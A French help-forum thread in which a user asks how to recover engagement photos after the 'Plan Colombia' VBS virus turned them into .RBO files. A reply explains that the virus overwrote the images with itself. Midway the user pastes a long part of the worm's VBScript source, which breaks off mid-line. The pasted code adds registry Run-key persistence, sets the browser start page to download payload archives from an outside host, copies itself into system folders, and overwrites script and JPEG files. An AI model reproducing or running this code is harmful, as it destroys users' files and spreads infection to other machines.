Jpeg transformé en RBO apres virus aidez moi

bonjour,

voila, j'ai eu le virus VBS COLOMBIA, j'ai reussi a l'éradiquer grace a un antivirus en ligne mais maintenant le probleme est que mes fichiers jpeg (mes seules photos de fiancailles, d'ou mon souci) ont été tranformées en extension RBO, et je n'arrive a trouver aucun logiciel pour les ouvrir.

Si vous avez la solution je vous en prie aidez moi, j'ai tout essayé, les t'chat...mais personne ne sait..je suis perdue..

EN vous remerciant

6 réponses

  1. Bonjour à toi

    Il y ya peut-être une solution si t'es fichier son blanc avec le signe windows dessus et qui il ya l'extension RBO eh bien tu n'a jusqu'à faire rennommer et mettre jpeg ou jpg à la place de RBO . Voilà !
    0
    1. merci de m'avoir repondu si vite, et bien en fait j'ai fait ouvric avec plusieurs fois afin d'essayer d'ouvrir le fichier avec je ne sais quel programme et l'a , le dernier c'était avec internet explorer du coupmon icone est blanc et bleu, j'ai tout de meme essayé de renomé avec jpeg a la fin mais rien n'y fait...si vous avez une autre idéee..en tout cas merci de m'avoir repondu si vite!
      0
      1. Slt!! Regarde bien la taille de ton fichier en ko ou mo si sa de 1 à 10ko la taille d'une photo à mon avis sa te les à bouffer que j'espere pas!
        Si c pas le cas il est recommandé de modifier l'extension de ton fichier à partir de ms-dos

        Pour d'autre question, je réponderai avec plasir

        Bon courage et félication pour tes fiancailles...
        0
        1. merci bcp c'est gentil...
          mes foto fon 12ko
          je vous montre ce kil y a marque sur les foto lorque je les ouvre avec le bloc note (je rapel ke ces apre le virus colombia que j'ai eu ca)
          merci pour votre aide

          rem ===============================================================================================
          rem "Plan Colombia" virus v1.0
          rem by Sand Ja9e Gr0w (www.colombia.com)

          rem Dedicated to all the people that want to be hackers or crackers, in Colombia
          rem This program is also a protest act against the violence and corruption that Colombia lives...
          rem I always wanting that all this finishes, I have said...

          rem Santa fe de Bogotá 2000/09
          rem I dedicate to all you the song "GoodBye" of Andreas Bochelli
          rem =================================================================================================

          rem Thanks God..!
          rem A greeting for "Lina María" from "Santa fe de Bogotá"
          rem A greeting for "Tizo" from "Spain"
          rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY"

          rem okay, ok...
          rem my baby start here...

          On Error Resume Next
          dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye
          eq=""
          ctr=0

          randomize
          numero = Int(Rnd * 3) + 1
          polye = ".GIF.vbs"
          If numero = 1 Then
          polye = ".BMP.vbs"
          Else
          If numero = 2 Then
          polye = ".JPG.vbs"
          End If
          End If

          polyn="\"&polyname(Int(Rnd * 5) + 4)&polye

          Set fso = CreateObject("Scripting.FileSystemObject")
          set file = fso.OpenTextFile(WScript.ScriptFullname,1)
          vbscopy=file.ReadAll
          main()
          If Day(Now) = 17 And Month(Now) = 9 Then
          MsgBox "Dedicated to my best brother=>Christiam Julian(C.J.G.S.)" & Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)"
          killnet()
          End If

          sub main()
          On Error Resume Next
          dim wscr,rr
          set wscr=CreateObject("WScript.Shell")
          rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
          if (rr>=1) then
          wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
          end if
          Set dirwin = fso.GetSpecialFolder(0)
          Set dirsystem = fso.GetSpecialFolder(1)
          Set dirtemp = fso.GetSpecialFolder(2)
          Set c = fso.GetFile(WScript.ScriptFullName)
          c.Copy(dirsystem&"\LINUX32.vbs")
          c.Copy(dirwin&"\reload.vbs")
          c.Copy(dirsystem&polyn)
          regruns()
          html()
          spreadtoemail()
          listadriv()
          end sub

          sub regruns()
          On Error Resume Next
          Dim num,downread,res
          regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32",dirsystem&"\LINUX32.vbs"
          regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\reload",dirwin&"\reload.vbs"
          downread=""
          downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
          if (downread="") then
          downread="c:\"
          end if

          rem acepta nombres largos..?
          if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
          Randomize
          Randomize
          num = Int((4 * Rnd) + 1)

          rem fatal => send virii
          if num = 2 then
          regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"
          else
          rem oh,, a picture.. nice :)
          if num = 3 then
          regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux321.zip"
          else
          rem oh,, other picture =:()
          if num = 4 then
          regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux322.zip"
          end if
          end if
          end if
          end if

          if (fileexist(downread&"\MACROMEDIA32.zip")=0) then
          res = Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & "\important_note.txt", vbHide)
          regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan colombia",dirwin&"\important_note.txt"
          regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
          else
          if (fileexist(downread&"\linux321.zip")=0) then
          Kill (dirwin & "\logos.sys")
          res = Shell("copy " & downread & "\linux321.zip " & dirwin & "\logos.sys", vbHide)
          regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
          else
          if (fileexist(downread&"\linux322.zip")=0) then
          Kill (dirwin & "\logow.sys")
          res = Shell("copy " & downread & "\linux322.zip " & dirwin & "\logow.sys", vbHide)
          regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
          end if
          end if
          end if
          end sub

          sub listadriv
          On Error Resume Next
          Dim d,dc,s
          Set dc = fso.Drives

          For Each d in dc
          If d.DriveType = 2 or d.DriveType=3 Then
          folderlist(d.path&"\")
          end if
          Next

          listadriv = s
          end sub

          sub infectfiles(folderspec)
          On Error Resume Next
          dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
          set f = fso.GetFolder(folderspec)
          set fc = f.Files

          for each f1 in fc
          ext=fso.GetExtensionName(f1.path)
          ext=lcase(ext)
          s=lcase(f1.name)
          if (ext="vbs") or (ext="vbe") then
          set ap=fso.OpenTextFile(f1.path,2,true)
          ap.write vbscopy
          ap.close
          else
          if(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
          set ap=fso.OpenTextFile(f1.path,2,true)
          ap.write vbscopy
          ap.close
          bname=fso.GetBaseName(f1.path)
          set cop=fso.GetFile(f1.path)
          cop.copy(folderspec&"\"&bname&".vbs")
          fso.DeleteFile(f1.path)
          else
          if(ext="jpg") or (ext="jpeg") then
          set ap=fso.OpenTextFile(f1.path,2,true)
          ap.write vbscopy
          ap.close
          set cop=fso.GetFile(f1.path)
          cop.copy(f1.path&".vbs")
          fso.DeleteFile(f1.path)
          else %
          0
          1. Arf !!
            Oui, le virus t'as bien détruit tes photos et s'est mis dedans. Le "texte" que tu vois n'est autre que le code en VB script du virus lui-même, d'ailleurs mon antivirus a râlé en croyant voir un virus dans le cache de mon navigateur. On voit bien dedans qu'il crée des noms de fichier avec double extension (.GIF.vbs par exemple), change les images de démarrage et fermeture (sous 98, pas sous XP) qu'il télécharge sur le net et remplace les fichiers jpg et jpeg par lui-même avec le même nom + .vbs (ainsi que les fichiers javascript, css, ...). Evite donc d'essayer d'ouvrir ces "photos" puisque tu risque de ré-activer le virus. Profites-en aussi pour ne pas cacher les extensions de fichiers connus (explorateur, option des dossiers)
            0
            1. ah, chui degouté, mais au moins je suis fixé.Je vous remercia a tous de m'avoir aider, c'est tres gentil de votre part.
              Peut etre a bientot et encore merci.
              0